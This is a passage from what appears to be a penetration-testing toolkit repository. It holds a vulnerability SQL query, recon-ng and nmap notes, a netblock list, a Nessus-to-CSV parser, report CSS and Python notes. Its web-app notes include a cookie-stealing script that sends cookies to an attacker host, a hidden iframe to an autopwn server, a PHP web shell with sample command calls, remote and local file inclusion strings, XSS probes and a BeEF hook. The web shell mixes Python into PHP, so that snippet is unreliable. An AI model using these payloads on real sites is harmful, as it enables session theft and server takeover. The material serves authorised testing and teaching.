 93 |      LEFT OUTER JOIN rolled_up_solutions sol USING (asset_id, vulnerability_id)
 94 |      LEFT OUTER JOIN dim_solution ds USING (solution_id)
 95 |      LEFT OUTER JOIN vulnerability_cves vcves USING (vulnerability_id)
 96 |      LEFT OUTER JOIN vulnerability_disa_vmskey dvms USING (vulnerability_id)
 97 |      LEFT OUTER JOIN vulnerability_disa_severity dvs USING (vulnerability_id)
 98 | 
 99 | ORDER BY da.ip_address, dv.title
100 | ------------------------------------------------------------------------------------------------------
101 | 
102 | # Creat custom SQL query for all vulnerabilities
103 | 
104 | SELECT title AS "Title", ROUND(cvss_score::numeric, 1) AS "CVSS Score"
105 | FROM dim_vulnerability
106 | ORDER BY title
107 | 
108 | 


--------------------------------------------------------------------------------
/notes/misc.txt:
--------------------------------------------------------------------------------
  1 | Misc
  2 | 
  3 | 
  4 | 1.  worksheet.xlsx > Hosts tab, hide all columns except IP, Port and Service.
  5 | 2.  Copy the text and paste into new file called tmp.
  6 | 3.  grep 'HTTP' tmp | awk '{print $1,":",$2}' | sed 's/ //g' > http.txt
  7 | 4.  grep 'HTTPS' tmp | awk '{print $1,":",$2}' | sed 's/ //g' > https.txt
  8 | 5.  Both files will feed options 7 Firefox and 8 Nikto.
  9 | 6.  https.txt will feed option 9 SSL Check.
 10 | ------------------------------------------------------------------------------------------------------
 11 | 
 12 | http://www.ipvoid.com/scan/targetIP
 13 | http://www.urlvoid.com/scan/$domain
 14 | http://www.fortiguard.com
 15 | 
 16 | nmap -p80 --script dns-brute $domain
 17 | ------------------------------------------------------------------------------------------------------
 18 | 
 19 | # recon-ng
 20 | 
 21 | *** Scan has already been run using hidden option 98 from Discover. ***
 22 | 
 23 | [recon-ng][default] > show workspaces
 24 | 
 25 |   +-----------------+
 26 |   |    Workspaces   |
 27 |   +-----------------+
 28 |   | target.com      |
 29 |   | default         |
 30 |   +-----------------+
 31 | 
 32 | [recon-ng][default] > workspaces select target.com
 33 | [recon-ng][target.com] > show dashboard
 34 | 
 35 |   +----------------------------------------------------+
 36 |   |                  Activity Summary                  |
 37 |   +----------------------------------------------------+
 38 |   |                    Module                   | Runs |
 39 |   +----------------------------------------------------+
 40 |   | recon/companies-contacts/facebook           | 1    |
 41 |   | recon/contacts-contacts/rapportive          | 1    |
 42 |   | recon/contacts-creds/haveibeenpwned         | 1    |
 43 |   | recon/contacts-creds/pwnedlist              | 1    |
 44 |   | recon/contacts-creds/should_change_password | 1    |
 45 |   | recon/domains-contacts/builtwith            | 1    |
 46 |   | recon/domains-contacts/pgp_search           | 1    |
 47 |   | recon/domains-contacts/whois_pocs           | 1    |
 48 |   | recon/domains-hosts/baidu_site              | 1    |
 49 |   | recon/domains-hosts/bing_domain_api         | 1    |
 50 |   | recon/domains-hosts/bing_domain_web         | 1    |
 51 |   | recon/domains-hosts/google_site_api         | 1    |
 52 |   | recon/domains-hosts/google_site_web         | 1    |
 53 |   | recon/domains-hosts/netcraft                | 1    |
 54 |   | recon/domains-hosts/shodan_hostname         | 1    |
 55 |   | recon/domains-hosts/yahoo_site              | 1    |
 56 |   | recon/domains-vulnerabilities/punkspider    | 1    |
 57 |   | recon/domains-vulnerabilities/xssed         | 1    |
 58 |   | recon/hosts-hosts/bing_ip                   | 1    |
 59 |   | recon/hosts-hosts/ip_neighbor               | 1    |
 60 |   | recon/hosts-hosts/ipinfodb                  | 1    |
 61 |   | recon/hosts-hosts/resolve                   | 1    |
 62 |   +----------------------------------------------------+
 63 | 
 64 |   +----------------------------+
 65 |   |      Results Summary       |
 66 |   +----------------------------+
 67 |   |     Category    | Quantity |
 68 |   +----------------------------+
 69 |   | Domains         | 1        |
 70 |   | Companies       | 1        |
 71 |   | Netblocks       | 0        |
 72 |   | Locations       | 0        |
 73 |   | Vulnerabilities | 0        |
 74 |   | Ports           | 5        |
 75 |   | Hosts           | 39       |
 76 |   | Contacts        | 66       |
 77 |   | Credentials     | 0        |
 78 |   | Leaks           | 0        |
 79 |   | Pushpins        | 0        |
 80 |   +----------------------------+
 81 | 
 82 | [recon-ng][target.com] > show ports
 83 | ...
 84 | [recon-ng][target.com] > show hosts
 85 | ...
 86 | [recon-ng][target.com] > show contacts
 87 | ...
 88 | 
 89 | 
 90 | 
 91 | 
 92 | 
 93 | recon-ng -w <workspace> -r <resource file>
 94 | 
 95 | workspaces <add|delete|select> <name>
 96 | Example: workspaces add target.com
 97 | Example: workspaces select target.com
 98 | 
 99 | Adds items to the database
100 | Usage: add [companies|contacts|creds|domains|hosts|leaks|locations|netblocks|ports|pushpins|vulnerabilities]
101 | Example: add domains
102 | domain (TEXT): target.com
103 | 
104 | spool start <file>
105 | 
106 | show modules
107 | 
108 | query SELECT <field, field2|*> FROM <hosts|contacts|creds> WHERE <field>='value' ORDER BY <field>
109 | 
110 | query SELECT host, ip_address FROM hosts ORDER BY host
111 | query SELECT last_name, first_name FROM contacts ORDER BY last_name
112 | 
113 | query SELECT email FROM contacts ORDER BY email
114 | query SELECT * FROM contacts ORDER BY fname
115 | query DELETE FROM hosts WHERE ip_address='192.168.2.12'
116 | ------------------------------------------------------------------------------------------------------
117 | 
118 | 


--------------------------------------------------------------------------------
/misc/netblocks.txt:
--------------------------------------------------------------------------------
  1 | OrgName:        Asia Pacific Network Information Centre
  2 | CIDR:           1.0.0.0/8
  3 | CIDR:           14.0.0.0/8
  4 | CIDR:           27.0.0.0/8
  5 | CIDR:           36.0.0.0/8
  6 | CIDR:           39.0.0.0/8
  7 | CIDR:           42.0.0.0/8
  8 | CIDR:           49.0.0.0/8
  9 | CIDR:           139.0.0.0/16
 10 | CIDR:           140.0.0.0/16
 11 | CIDR:           144.0.0.0/16
 12 | CIDR:           153.0.0.0/8
 13 | CIDR:           157.0.0.0/16
 14 | CIDR:           163.0.0.0/8
 15 | CIDR:           171.0.0.0/8
 16 | 
 17 | OrgName:        General Electric
 18 | CIDR:           3.0.0.0/8
 19 | 
 20 | OrgName:        Level 3 Communications
 21 | CIDR:           4.0.0.0/8
 22 | CIDR:           8.0.0.0/8
 23 | 
 24 | OrgName:        RIPE Network Coordination Centre
 25 | CIDR:           5.0.0.0/8
 26 | CIDR:           25.0.0.0/8
 27 | CIDR:           31.0.0.0/8
 28 | CIDR:           37.0.0.0/8
 29 | CIDR:           128.0.0.0/16
 30 | CIDR:           130.0.0.0/16
 31 | CIDR:           134.0.0.0/16
 32 | CIDR:           146.0.0.0/16
 33 | CIDR:           149.0.0.0/16
 34 | CIDR:           159.0.0.0/16
 35 | CIDR:           176.0.0.0/8
 36 | CIDR:           185.0.0.0/8
 37 | 
 38 | OrgName:        Headquarters, USAISC
 39 | CIDR:           6.0.0.0/8
 40 | CIDR:           55.0.0.0/8
 41 | 
 42 | OrgName:        DoD Network Information Center
 43 | CIDR:           7.0.0.0/8
 44 | CIDR:           11.0.0.0/8
 45 | CIDR:           21.0.0.0/8
 46 | CIDR:           22.0.0.0/8
 47 | CIDR:           26.0.0.0/8
 48 | CIDR:           28.0.0.0/8
 49 | CIDR:           29.0.0.0/8
 50 | CIDR:           30.0.0.0/8
 51 | CIDR:           33.0.0.0/8
 52 | CIDR:           158.0.0.0/16
 53 | CIDR:           205.32.0.0/12, 205.48.0.0/13, 205.0.0.0/11
 54 | CIDR:           214.0.0.0/8
 55 | CIDR:           215.0.0.0/8
 56 | 
 57 | OrgName:        IBM
 58 | CIDR:           9.0.0.0/8
 59 | 
 60 | OrgName:        Internet Assigned Numbers Authority
 61 | CIDR:           10.0.0.0/8
 62 | CIDR:           127.0.0.0/8
 63 | 
 64 | OrgName:        Xerox Corporation
 65 | CIDR:           13.0.0.0/8
 66 | 
 67 | OrgName:        Hewlett-Packard
 68 | CIDR:           15.0.0.0/8
 69 | CIDR:           16.0.0.0/8
 70 | 
 71 | OrgName:        Apple
 72 | CIDR:           17.0.0.0/8
 73 | 
 74 | OrgName:        Massachusetts Institute of Technology
 75 | CIDR:           18.0.0.0/8
 76 | 
 77 | OrgName:        Ford Motor Company
 78 | CIDR:           19.0.0.0/8
 79 | 
 80 | OrgName:        Computer Sciences Corporation
 81 | CIDR:           20.0.0.0/8
 82 | 
 83 | OrgName:        AT&T Global Network Services
 84 | CIDR:           32.0.0.0/8
 85 | 
 86 | OrgName:        Halliburton
 87 | CIDR:           34.0.0.0/8
 88 | 
 89 | OrgName:        PSINet
 90 | CIDR:           38.0.0.0/8
 91 | 
 92 | OrgName:        Amateur Radio Digital Communications
 93 | CIDR:           44.0.0.0/8
 94 | 
 95 | OrgName:        The Prudential Insurance Company of America
 96 | CIDR:           48.0.0.0/8
 97 | 
 98 | OrgName:        E.I. du Pont
 99 | CIDR:           52.0.0.0/8
100 | 
101 | OrgName:        cap debis ccs
102 | CIDR:           53.0.0.0/8
103 | 
104 | OrgName:        United States Postal Service
105 | CIDR:           56.0.0.0/8
106 | 
107 | OrgName:        SITA-Societe Internationale de Telecommunications Aeronautiques
108 | CIDR:           57.0.0.0/8
109 | 
110 | OrgName:        UUNET Technologies
111 | CIDR:           63.0.0.0/10
112 | 
113 | OrgName:        XO Communications
114 | CIDR:           64.0.0.0/14
115 | 
116 | OrgName:        Qwest Communications
117 | CIDR:           67.0.0.0/13
118 | 
119 | OrgName:        Embarq Corporation
120 | CIDR:           71.0.0.0/14
121 | CIDR:           76.0.0.0/13
122 | 
123 | OrgName:        Cellco Partnership DBA Verizon Wireless
124 | CIDR:           97.0.0.0/10
125 | 
126 | OrgName:        Time Warner Cable
127 | CIDR:           98.0.0.0/12
128 | 
129 | OrgName:        AT&T Internet Services
130 | CIDR:           99.0.0.0/9
131 | 
132 | OrgName:        African Network Information Center
133 | CIDR:           129.0.0.0/16
134 | CIDR:           155.0.0.0/16
135 | CIDR:           156.0.0.0/16
136 | CIDR:           160.0.0.0/16
137 | CIDR:           165.0.0.0/16
138 | CIDR:           169.0.0.0/16
139 | 
140 | OrgName:        Latin American and Caribbean IP address Regional Registry
141 | CIDR:           131.0.0.0/16
142 | CIDR:           138.0.0.0/16
143 | CIDR:           143.0.0.0/16
144 | CIDR:           148.0.0.0/16
145 | CIDR:           152.0.0.0/16
146 | CIDR:           161.0.0.0/16
147 | CIDR:           167.0.0.0/16
148 | CIDR:           168.0.0.0/16
149 | CIDR:           177.0.0.0/8
150 | CIDR:           179.0.0.0/8
151 | CIDR:           181.0.0.0/8
152 | CIDR:           170.0.0.0/16
153 | 
154 | OrgName:        AT&T Internet Services
155 | CIDR:           172.0.0.0/12
156 | 
157 | OrgName:        Shaw Communications
158 | CIDR:           174.0.0.0/13
159 | 
160 | OrgName:        Sprint
161 | CIDR:           208.0.0.0/11, 208.32.0.0/14
162 | 
163 | 


--------------------------------------------------------------------------------
/parse-nessus-feed.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | #
  3 | # by John Kim
  4 | # Converts the Nessus plugin database into a CSV file with the following columns:
  5 | #    Plugin, CVSS Base Score, Description, Solution
  6 | #
  7 | # Genrate database
  8 | #
  9 | # Kali Linux
 10 | # /opt/nessus/sbin/nessusd -X
 11 | # mv /opt/nessus/lib/nessus/plugins/plugins.xml /root/
 12 | # 
 13 | # OS X
 14 | # sudo /Library/Nessus/run/sbin/Nessusd -X
 15 | # sudo mv /Library/Nessus/run/lib/nessus/plugins/plugins.xml ./
 16 | # 
 17 | # Usage: parse-nessus-master.py input.xml output.csv
 18 | 
 19 | import codecs
 20 | import cStringIO
 21 | import csv
 22 | import sys
 23 | import xml.etree.ElementTree as ET
 24 | 
 25 | class UnicodeWriter:
 26 |     """
 27 |     A CSV writer which will write rows to CSV file "f",
 28 |     which is encoded in the given encoding.
 29 |     """
 30 | 
 31 |     def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
 32 |         # Redirect output to a queue
 33 |         self.queue = cStringIO.StringIO()
 34 |         self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
 35 |         self.stream = f
 36 |         self.encoder = codecs.getincrementalencoder(encoding)()
 37 | 
 38 |     def writerow(self, row):
 39 |         self.writer.writerow([s.encode("utf-8") for s in row])
 40 |         # Fetch UTF-8 output from the queue ...
 41 |         data = self.queue.getvalue()
 42 |         data = data.decode("utf-8")
 43 |         # ... and reencode it into the target encoding
 44 |         data = self.encoder.encode(data)
 45 |         # Write to the target stream
 46 |         self.stream.write(data)
 47 |         # Empty queue
 48 |         self.queue.truncate(0)
 49 | 
 50 |     def writerows(self, rows):
 51 |         for row in rows:
 52 |             self.writerow(row)
 53 | 
 54 | ################################################################
 55 | 
 56 | def write_results(results_table, out_filename):
 57 |     print "\nWriting CSV data..."
 58 |     try:
 59 |         with open(out_filename, 'wb') as csvfile:
 60 |             sum_write = UnicodeWriter(csvfile)
 61 |             sum_write.writerows(results_table)
 62 | 
 63 |     except IOError as e:
 64 |         print "Error writing CSV file. Check for permissions and/or path."
 65 |         exit()
 66 | 
 67 | ################################################################
 68 | 
 69 | def max_field_len_excel(ggchild, row_number):
 70 |     field = ggchild[1].text
 71 |     if len(field) > 32767:
 72 |         fname = "row.{}.{}.txt".format(row_number, ggchild[0].text)
 73 |         try:
 74 |             with open(fname, "wb") as trunk_file:
 75 |                 trunk_file.write(field[32000:])
 76 |         except IOError:
 77 |             print "Error writing remainder of the column data to file. Check for permissions and/or path."
 78 |             exit()
 79 | 
 80 |         print "Row {}, '{}' was truncated. The remainder can be found here: {}".format(row_number, ggchild[0].text, fname)
 81 |         return field[:32000]+"[TRUNCATED file:{}]".format(fname)
 82 |     else:
 83 |         return field
 84 | 
 85 | ################################################################
 86 | 
 87 | def get_sum_from_xml(filename):
 88 |     print "\nParsing XML data. This takes about 90 sec...\n"
 89 |     results_table = [["Plugin", "CVSS Base Score", "Description", "Solution", "Date"]]
 90 | 
 91 |     try:
 92 |         tree = ET.parse(filename)
 93 |         root = tree.getroot()
 94 |     except:
 95 |         print "Error reading/parsing XML file. Likely XML file is mangled in some way. Check the XML file."
 96 |         exit()
 97 | 
 98 |     row_tracker = 1
 99 |     for child in root:
100 |         row_tracker += 1
101 |         row = ["", "", "", "", ""]
102 |         for gchild in child:
103 | 
104 |             if gchild.tag == "script_name":
105 |                 row[0] = gchild.text
106 | 
107 |             if gchild.tag == "attributes":
108 |                 for ggchild in gchild:
109 |                     if ggchild[0].text == "cvss_base_score":
110 |                         row[1] = ggchild[1].text
111 |                         
112 |                     elif ggchild[0].text == "description":
113 |                         row[2] = max_field_len_excel(ggchild, row_tracker)
114 | 
115 |                     elif ggchild[0].text == "solution":
116 |                         row[3] = max_field_len_excel(ggchild, row_tracker)
117 | 
118 |                     elif ggchild[0].text == "plugin_publication_date":
119 |                         row[4] = max_field_len_excel(ggchild, row_tracker)
120 | 
121 |         results_table.append(row)
122 | 
123 |     return results_table
124 | 
125 | ################################################################
126 | 
127 | if __name__ == "__main__":
128 |     if len(sys.argv) == 3:
129 |         results = get_sum_from_xml(sys.argv[1])
130 |         write_results(results, sys.argv[2])
131 |         print "\nConverted {} rows to CSV format.\n\n".format(len(results))
132 |     else:
133 |         print "\nUsage: {} input.xml output.csv\n " \
134 |               "Any field longer then 32,000 is truncated.".format(sys.argv[0])
135 |         exit()
136 | 
137 | 


--------------------------------------------------------------------------------
/report/css/style.css:
--------------------------------------------------------------------------------
  1 | 
  2 | * {
  3 | 	margin: 0;
  4 | 	padding: 0;
  5 | 	box-sizing:         border-box;
  6 | }
  7 | 
  8 | html { overflow-y:scroll; }
  9 | 
 10 | body {
 11 | 	background: #fff;
 12 | 	color: #333333;
 13 | 	font-family: sans-serif;
 14 | 	font-size: 1em;
 15 | }
 16 | 
 17 | /* Headings */
 18 | h1,h2,h3,h4,h5,h6 { 
 19 | 	font-weight: normal;
 20 | 	margin: 0;
 21 | 	padding: 0;
 22 | }
 23 | 
 24 | h1 { font-size: 40px; }
 25 | h2 { font-size: 30px; }
 26 | h3 { font-size: 20px; }
 27 | h4 { font-size: 16px; }
 28 | h5 { font-size: 14px; }
 29 | h6 { font-size: 12px; }
 30 | 
 31 | h1 small, h2 small, h3 small, h4 small, h5 small, h6 small {
 32 | 	font-weight: normal;
 33 | 	line-height: 1.4;
 34 | 	color: #999999;
 35 | }
 36 | 
 37 | h2 small {
 38 | 	font-size: 20px;
 39 | }
 40 | 
 41 | h2 small.lg-text {
 42 | 	font-size: 26px;
 43 | }
 44 | 
 45 | ul, ol {
 46 | 	margin: 0 0 15px 30px;
 47 | 	padding: 0;
 48 | }
 49 | 
 50 | li {
 51 | 	line-height: 1.3em;
 52 | 	margin: 0 0 15px;
 53 | 	list-style: disc;
 54 | }
 55 | 
 56 | /* Links */
 57 | a, a:visited {
 58 | 	text-decoration: underline;
 59 | }
 60 | 
 61 | a:hover, a:focus {
 62 | 	text-decoration: none;
 63 | }
 64 | 
 65 | a:focus { 
 66 |      outline: none;
 67 | }
 68 | 
 69 | .float-left, .alignleft {
 70 | 	float: left;
 71 | 	margin: 0 15px 10px 0;
 72 | }
 73 | 
 74 | .float-right, .alignright {
 75 | 	float: right;
 76 | 	margin: 0 0 10px 15px;
 77 | }
 78 | 
 79 | .text-center {
 80 | 	text-align: center;
 81 | }
 82 | 
 83 | /* Header / Primary / Secondary Navigation */
 84 | .header-wrap {
 85 | 	overflow: hidden;
 86 | }
 87 | 
 88 | .nav {
 89 | 	width: 100%;         /* Spans the width of the page */
 90 | 	height: 50px;
 91 | 	margin: 0;           /* Ensures there is no space between sides of the screen and the menu */
 92 | 	z-index: 99;         /* Makes sure that your menu remains on top of other page elements */
 93 | 	position: relative; 
 94 | 	background-color: #ededed;
 95 | 	background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#f2f2f2), to(#ededed));
 96 | 	background-image: -webkit-linear-gradient(top, #f2f2f2, #ededed); 
 97 | 	background-image:    -moz-linear-gradient(top, #f2f2f2, #ededed);
 98 | 	background-image:     -ms-linear-gradient(top, #f2f2f2, #ededed);
 99 | 	background-image:      -o-linear-gradient(top, #f2f2f2, #ededed);
100 | 	border-top: 1px solid white;
101 | 	border-bottom: 2px solid #d4d4d4;
102 | }
103 | 
104 | .navbar {
105 |      padding: 1;
106 | 	margin: 1;
107 | 	position: absolute;  /* Ensures that the menu doesn’t affect other elements */
108 | 	border-right: 1px solid #fff; 
109 | }
110 | 
111 | ul.navbar {
112 | 	margin: 0;
113 | 	padding: 0; 
114 | }
115 | 
116 | .navbar li {
117 | 	height: auto;
118 | 	width: 160px;        /* Each menu item */
119 | 	float: left;         /* This lines up the menu items horizontally */
120 | 	text-align: center;  /* All text is placed in the center of the box */
121 | 	list-style: none;    /* Removes the default styling (bullets) for the list */
122 | 	font: normal bold 14px/1.2em sans-serif;  
123 | 	padding: 0;
124 | 	margin: 0;
125 | }
126 | 
127 | .navbar a {							
128 | 	padding: 18px 0;     /* Adds a padding on the top and bottom so the text appears centered vertically */
129 | 	border-left: 1px solid #fff; /* Creates a border in a slightly lighter shade of blue than the background.  Combined with the right border, this creates a nice effect. */
130 | 	border-right: 1px solid #ededed; /* Creates a border in a slightly darker shade of blue than the background.  Combined with the left border, this creates a nice effect. */
131 | 	text-decoration: none;  /* Removes the default hyperlink styling. */
132 | 	color: #3C3B3B;      /* Text color is white */
133 | 	display: block;
134 | 	text-shadow: 1px 1px 1px #C6C3C3;
135 | }
136 | 
137 | .navbar li:hover, a:hover,
138 | li.current {
139 | 	background-color: #fff;
140 | } 
141 | 
142 | .navbar li ul {
143 | 	display: none;       /* Hides the drop-down menu */
144 | 	height: auto;								
145 | 	margin: 0;           /* Aligns drop-down box underneath the menu item */
146 | 	padding: 0;          /* Aligns drop-down box underneath the menu item */			
147 | }				
148 | 
149 | .navbar li:hover ul {
150 | 	display: block;      /* Displays the drop-down box when the menu item is hovered over */
151 | }
152 | 
153 | .navbar li ul li {
154 | 	background-color: #fff;
155 | 	width: 160px;        /* Width of the drop-down box when the menu item is hovered over */ 
156 | }
157 | 
158 | .navbar li ul li a {
159 | 	border-left: 1px solid #d4d4d4; 
160 | 	border-right: 1px solid #d4d4d4;
161 | 	border-top: 1px solid #d4d4d4;
162 | 	border-bottom: 1px solid #d4d4d4;
163 | 	padding: 15px 20px;
164 | 	text-align: left;
165 | }
166 | 				
167 | .navbar li ul li a:hover	{background-color: #eee;}
168 | 
169 | .wrapper {
170 | 	width: 1160px;
171 | 	margin: 0 auto;
172 | 	padding: 2em 0;
173 | }
174 | 
175 | .page-header {
176 | 	padding-bottom: 5px;
177 | 	border-bottom: 1px solid #eeeeee;
178 | }
179 | 
180 | iframe {
181 | 	height: 808px;
182 | 	width: 1160px;
183 | 	border: none;
184 | }
185 | 
186 | 


--------------------------------------------------------------------------------
/misc/python/notes.txt:
--------------------------------------------------------------------------------
  1 | Python notes.
  2 | 
  3 | tutorialspoint.com/python/index.htm
  4 | learnpythonthehardway.org/book/
  5 | ------------------------------------------------------------------------------------------------------
  6 | 
  7 | Color
  8 | 
  9 | W = '\033[0m'    # white (normal)
 10 | R = '\033[31m'   # red
 11 | G = '\033[32m'   # green
 12 | O = '\033[33m'   # orange
 13 | B = '\033[34m'   # blue
 14 | P = '\033[35m'   # purple
 15 | C = '\033[36m'   # cyan
 16 | GR = '\033[37m'  # gray
 17 | T = '\033[93m'   # tan
 18 | 
 19 | print R.format('Test')
 20 | ------------------------------------------------------------------------------------------------------
 21 | 
 22 | import os
 23 | 
 24 | os.system('clear')                           # Clear the screen
 25 | os.chdir('newdir')                           # Change directory
 26 | os.mkdir('/root/test/')                      # Create a directory
 27 | os.system('mkdir tmp')                       # Issue a command
 28 | os.rmdir('tmp')                              # Remove a directory
 29 | os.remove('tmp')                             # Remove a file
 30 | os.rename('tmp' 'tmp2')                      # Rename a file
 31 | ------------------------------------------------------------------------------------------------------
 32 | 
 33 | import sys
 34 | 
 35 | sys.exit(0)                                  # Exit program OK
 36 | sys.exit(1)                                  # Exit program with an error
 37 | ------------------------------------------------------------------------------------------------------
 38 | 
 39 | firstname = raw_input('First name: ')        # Get input from user
 40 | raw_input("Press enter key to continue.")
 41 | 
 42 | webbrowser.open('http://www.apple.com/')     # Open a URL
 43 | 
 44 | time.sleep(1)                                # Sleep for 1 sec
 45 | ------------------------------------------------------------------------------------------------------
 46 | 
 47 | if expression:
 48 |      statement(s)
 49 | 
 50 | if firstname == '':                          # Check for no input
 51 |      print 'You did not enter a name.'
 52 | 
 53 | if int(port) in range(1,65535):              # Valid range
 54 |      print 'That is a valid port.'
 55 | 
 56 | if len(password) < 8:                        # Valid size
 57 |      print 'Your password is leak.'
 58 | 
 59 | if not os.path.exists('/root/test'):         # If folder does not exist, create it
 60 |      os.mkdir('/root/test')
 61 | ------------------------------------------------------------------------------------------------------
 62 | 
 63 | if expression:
 64 |      statement(s)
 65 | else:
 66 |      statement(s)
 67 | --------------------
 68 | 
 69 | if expression1:
 70 |      statement(s)
 71 | elif expression2:
 72 |      statement(s)
 73 | else:
 74 |      statement(s)
 75 | --------------------
 76 | 
 77 | while expression:
 78 |      statement(s)
 79 | ------------------------------------------------------------------------------------------------------
 80 | 
 81 | Example
 82 | #!/usr/bin/env python
 83 | 
 84 | import os
 85 | import sys
 86 | 
 87 | os.system('clear')
 88 | port = raw_input('\nEnter a valid port: ')
 89 | 
 90 | if port == '':
 91 |      print '\nYou did not enter anything.\n\n'
 92 |      sys.exit(1)
 93 | 
 94 | try:
 95 |      val = int(port)
 96 | except ValueError:
 97 |      print('\nThat is not an number.\n\n')
 98 |      sys.exit(1)
 99 | 
100 | if int(port) not in range(1,65535):
101 |      print '\nThat is an invalid port.\n\n'
102 | else:
103 |      print '\nThat is a valid port.\n\n'
104 | ---------------------------------------------------
105 | 
106 | Example
107 | count = 0
108 | while (count < 9):
109 |      print 'The count is:', count
110 |      count = count + 1
111 | ---------------------------------------------------
112 | 
113 | Example
114 | count = 0
115 | while count < 5:
116 |      print count, " is less than 5."
117 |      count = count + 1
118 | else:
119 |      print count, " equals 5."
120 | ------------------------------------------------------------------------------------------------------
121 | 
122 | f = open ('tmp','w')                         # Setup a write connection to a file
123 | f.write('These are my notes.')               # Write data to file
124 | f.close()                                    # Close the connection
125 | 
126 | f = open('tmp','r')                          # Setup a read connection to a file
127 | filedata = f.read()                          # Read the file
128 | f.close()                                    # Close the connection
129 | filedata = filedata.split('\n')              # Turn into a list
130 | ------------------------------------------------------------------------------------------------------
131 | 
132 | execfile('recon.py')                         # Run a python script
133 | subprocess.call('crack-wifi.sh')             # Run a bash script
134 | ------------------------------------------------------------------------------------------------------
135 | 
136 | for i in file:                               # Remove lines that start with FOO
137 |   if i[0] != "FOO":
138 |       print i
139 | ------------------------------------------------------------------------------------------------------
140 | 
141 | Dictionary                                   # Standard data types
142 | List
143 | Numbers
144 | String
145 | Tuple
146 | ------------------------------------------------------------------------------------------------------
147 | 
148 | Misc
149 | 
150 | try:
151 |     import xml.etree.cElementTree as ET      # Much, much faster and consumes significantly less memory
152 | except ImportError:
153 |     import xml.etree.ElementTree as ET
154 | 
155 | 


--------------------------------------------------------------------------------
/notes/web-apps.txt:
--------------------------------------------------------------------------------
  1 | Web Apps
  2 | 
  3 | 
  4 | # Request Methods
  5 | 
  6 | GET  Passes all query material in the URL query string.
  7 | POST Passes all requested data in the HTTP request body.
  8 | ------------------------------------------------------------------------------------------------------
  9 | 
 10 | # Common Response Status Codes
 11 | 
 12 | 1xx  Informational
 13 | 100  Continue
 14 | 
 15 | 2xx  Success
 16 | 200  OK
 17 | 
 18 | 3xx  Redirection
 19 | 301  Moved Permanently
 20 | 302  Found
 21 | 
 22 | 4xx  Client Error
 23 | 401  Unauthorized
 24 | 403  Forbidden
 25 | 404  Not Found
 26 | 408  Request Timeout
 27 | 
 28 | 5xx  Server Error
 29 | 500  Internal Server Error
 30 | ------------------------------------------------------------------------------------------------------
 31 | 
 32 | # Cookies
 33 | 
 34 | Secure - only send over encrypted channel
 35 | HttpOnly - prevents JavaScript from accessing the cookie
 36 | ------------------------------------------------------------------------------------------------------
 37 | 
 38 | # Apache version, eTag, HTTP Basic Authentication Enabled
 39 | 
 40 | telnet <target IP> 80
 41 | HEAD / HTTP/1.0
 42 | (hit enter 2x)
 43 | 
 44 | for i in `cat 80.txt` ; do curl -iskXHEAD http://$i/ > $i 2>&1 ; echo Scanned $i ; done
 45 | ------------------------------------------------------------------------------------------------------
 46 | 
 47 | # Browser Redirection
 48 | 
 49 | <iframe SRC="http://hackerip/report" height = "0" width ="0">
 50 | hacker:  use Metasploit browser autopwn listening on hackerip
 51 | ------------------------------------------------------------------------------------------------------
 52 | 
 53 | # Cisco Router
 54 | 
 55 | x is between 15 and 99.
 56 | https://targetIP/level/x/exec/-/show
 57 | ------------------------------------------------------------------------------------------------------
 58 | 
 59 | # Cookie Security Issues - missing HttpOnly or Secure attribute
 60 | 
 61 | Firefox
 62 | Cookies > View Cookie Information
 63 | HttpOnly cookie tells the browser if a Java scripts tries to access the cookie, the browser should not return a value.
 64 | 
 65 | for i in `cat 80.txt` ; do curl -iskXHEAD http://$i/ > $i 2>&1 ; echo Scanned $i ; done
 66 | ------------------------------------------------------------------------------------------------------
 67 | 
 68 | # Cookie Stealing
 69 | 
 70 | <script>new Image().src="http://hackerip/woot.php?"+ document.cookie;</script>
 71 | hacker:  nc -lvp 80
 72 | ------------------------------------------------------------------------------------------------------
 73 | 
 74 | # File upload vuln 
 75 | 
 76 | Create a php file called evil.php 
 77 | <?php
 78 | $cmd=$_GET["cmd"];
 79 | $decode=base64_decode($cmd);
 80 | os.system($decode);
 81 | ?>
 82 | 
 83 | Once the malicious file is in place, pass base64 encoded commands to it, and get basic code execution on the web server, as the “apache” user.
 84 | 
 85 | wget -O output -o /dev/null www.target.com/photos/evil.php?cmd=$(echo id|base64)
 86 | cat output
 87 | 
 88 | wget -O output -o /dev/null www.target.com/photos/evil.php?cmd=$(echo ifconfig|base64)
 89 | cat output
 90 | ------------------------------------------------------------------------------------------------------
 91 | 
 92 | # Fuzzing
 93 | 
 94 | When fuzzing headers, disable URL Encode.
 95 | When you are inside of a POST parameter, always use URL encoding.
 96 | ------------------------------------------------------------------------------------------------------
 97 | 
 98 | # Local file inclusion
 99 | 
100 | http://localhost/index.php?page=/etc/passwd
101 | ------------------------------------------------------------------------------------------------------
102 | 
103 | # PHP version
104 | 
105 | telnet <target IP> 80
106 | GET / HEAD/1.0
107 | 
108 | http://target IP/aaaaa.php
109 | 
110 | Firefox > Web Developer Toolbar > Information > View Response Headers
111 | ------------------------------------------------------------------------------------------------------
112 | 
113 | # Remote file inclusion
114 | 
115 | http://localhost/index.php?page=http://attackersHost/evil.txt
116 | ------------------------------------------------------------------------------------------------------
117 | 
118 | # TRACE / TRACK methods allowed
119 | 
120 | telnet <target IP> 80
121 | OPTIONS / HTTP/1.0
122 | (hit enter 2x)
123 | ------------------------------------------------------------------------------------------------------
124 | 
125 | # WebDAV extensions are enabled
126 | 
127 | msfconsole
128 | use auxiliary/scanner/http/webdav_scanner
129 | 
130 | ./davtest.pl -url http://target-IP
131 | 
132 | for i in $(cat 80.txt); do cadaver -t $i; done
133 | ------------------------------------------------------------------------------------------------------
134 | 
135 | # WordPress XSS vuln
136 | 
137 | wpscan.rb - -url www.target.com - -enumerate p
138 | ------------------------------------------------------------------------------------------------------
139 | 
140 | # XML Injection
141 | 
142 | Single quote		foo'
143 | Double quote		foo”
144 | Greater than		foo>
145 | Less than           foo<			
146 | Comment tag		foo<!--
147 | Ampersand           &foo
148 | ------------------------------------------------------------------------------------------------------
149 | 
150 | # XSS
151 | 
152 | http://target.com/index.php?user=<script>alert(1)</script>
153 | http://target.com/index.php?user=<script>alert("Test XSS")alert</script>
154 | 
155 | curl https://target.com/login.php?user=`perl –e 'print "a" x 500'`
156 | 
157 | <iframe height=”0″ width=”0″ src=<BeEF_hook></iframe>
158 | 
